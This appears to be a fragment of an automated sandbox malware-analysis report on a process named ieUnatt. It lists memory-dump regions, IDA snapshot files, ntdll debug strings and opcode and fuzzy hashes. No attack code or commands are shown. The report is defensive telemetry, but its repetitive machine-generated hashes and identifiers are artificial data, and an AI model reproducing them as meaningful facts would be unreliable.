                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04874787
                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04874655
                                                                                                                                                          • ExecuteOptions, xrefs: 048746A0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                          • Opcode ID: 947b1b701341e1d2d1d392fa33db811c8af0772a0f4c033c8f1e520278616f48
                                                                                                                                                          • Instruction ID: e47a0edc567886aee6e44987a5de82c6a301150cc209a78bb20cd1b997dc5607
                                                                                                                                                          • Opcode Fuzzy Hash: 947b1b701341e1d2d1d392fa33db811c8af0772a0f4c033c8f1e520278616f48
                                                                                                                                                          • Instruction Fuzzy Hash: 8451E8B160021D7AEB10AB69DC95FB973A8EB08709F044EA9D505E7190F7B0FE45CF91
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                          • Instruction ID: 582929a8d9547cd8e26066fd947424956bf7875b74cc8515f9911bb4d52b6dff
                                                                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                          • Instruction Fuzzy Hash: 4681AE70E0524D9BEF248F68C8917BEBBA2AFC5364F184B1AD861E7290D734F8408B51
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0487031E
                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048702BD
                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048702E7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                          • Opcode ID: 9139fdb92cf0e69b6b3f5a5d3415fab3ea4c3d58a5c87ddf048f59d6439ccc01
                                                                                                                                                          • Instruction ID: 9ec2d3cd3ed3a1a08833440eb1b46282d37c2b5c2a9a5aac0b50be1051eb4901
                                                                                                                                                          • Opcode Fuzzy Hash: 9139fdb92cf0e69b6b3f5a5d3415fab3ea4c3d58a5c87ddf048f59d6439ccc01
                                                                                                                                                          • Instruction Fuzzy Hash: A5E1AB306087459FD725CF28C994B2AB7F0AB89718F140F59F6A5CB290E774E984DB42
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 04877BAC
                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04877B7F
                                                                                                                                                          • RTL: Resource at %p, xrefs: 04877B8E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                          • Opcode ID: 1c320fe9a66af5bd36ab1b96e09c531214dda68d57be525d50cc7559f418172e
                                                                                                                                                          • Instruction ID: b896f26588d1bc18297c26fa269cb7a157525bad06ffbab64be2c7706786186d
                                                                                                                                                          • Opcode Fuzzy Hash: 1c320fe9a66af5bd36ab1b96e09c531214dda68d57be525d50cc7559f418172e
                                                                                                                                                          • Instruction Fuzzy Hash: 2441CF717007069FD724DE29C850B6AB7E5EB88725F100F2DF95ADB281DB71F8058B92
                                                                                                                                                          APIs
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0487728C
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 048772C1
                                                                                                                                                          • RTL: Resource at %p, xrefs: 048772A3
                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04877294
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                          • Opcode ID: 72795bca3df845172c5911cbc987a3b8cd911a5d845f644091870f8d4c180605
                                                                                                                                                          • Instruction ID: f0381a9ab14efbff56c5f99fc81f5a6bb435bcda8c0abc5a63fedfd4f3957f38
                                                                                                                                                          • Opcode Fuzzy Hash: 72795bca3df845172c5911cbc987a3b8cd911a5d845f644091870f8d4c180605
                                                                                                                                                          • Instruction Fuzzy Hash: F841D071700246ABD720DE29CC41F66B7A5FB84719F100F19FA66EB241DB61F852CBD1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513491170.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_46c0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $$0:7"$1,?&$3zv4$zv23
                                                                                                                                                          • API String ID: 0-379306231
                                                                                                                                                          • Opcode ID: ff15ea654525b40ac11d1f418f6c1f760e806326c8e1028e0868aabd69452887
                                                                                                                                                          • Instruction ID: 5a25bad1706600e7e8574b3b85abe333ca69b5df34e7f3722918d31bef226b8e
                                                                                                                                                          • Opcode Fuzzy Hash: ff15ea654525b40ac11d1f418f6c1f760e806326c8e1028e0868aabd69452887
                                                                                                                                                          • Instruction Fuzzy Hash: 10F089300287444FC708AF14C44469676E1FB89348F80165CF88ACB251EB75C6058B87
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-
                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction ID: af7e84beeefef9a9f8e07ef2b7b18cd7d030a7120f481fbf5c71eff592d932e5
                                                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction Fuzzy Hash: 6191AF70E0021E9ADB24DF69C880ABEB7A5AFC4724F544F1AEC55E72C0E774B9408B21
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $$@
                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                          • Opcode ID: 46acc2634033342d2bc6637846a0c51b0af60b48d7c81d1e27664675da9d1672
                                                                                                                                                          • Instruction ID: 292af9ed6c88a7cb75236a1206bbcd8270feab3077926cd2d93984e0ad4aa35b
                                                                                                                                                          • Opcode Fuzzy Hash: 46acc2634033342d2bc6637846a0c51b0af60b48d7c81d1e27664675da9d1672
                                                                                                                                                          • Instruction Fuzzy Hash: B1812DB1D012699BDB71DF54CC44BEAB7B8AB08714F0046DAE91AF7280E7746E84CF61
                                                                                                                                                          APIs
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0488CFBD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFilterFunc@8
                                                                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                                                                          • API String ID: 4062629308-3101775584
                                                                                                                                                          • Opcode ID: cab3fe0205c1c0af8b00ab852fdfd7ff1109bb7367e14300b52111d8f47841de
                                                                                                                                                          • Instruction ID: 4361fcc7ff33434755adcf5dff1f276f6e465e964027b8977821ec75638e0049
                                                                                                                                                          • Opcode Fuzzy Hash: cab3fe0205c1c0af8b00ab852fdfd7ff1109bb7367e14300b52111d8f47841de
                                                                                                                                                          • Instruction Fuzzy Hash: BD418571900218DFEB21AF99D840A6DBBF8FF54704F004A2EED15EB265E774E901CB62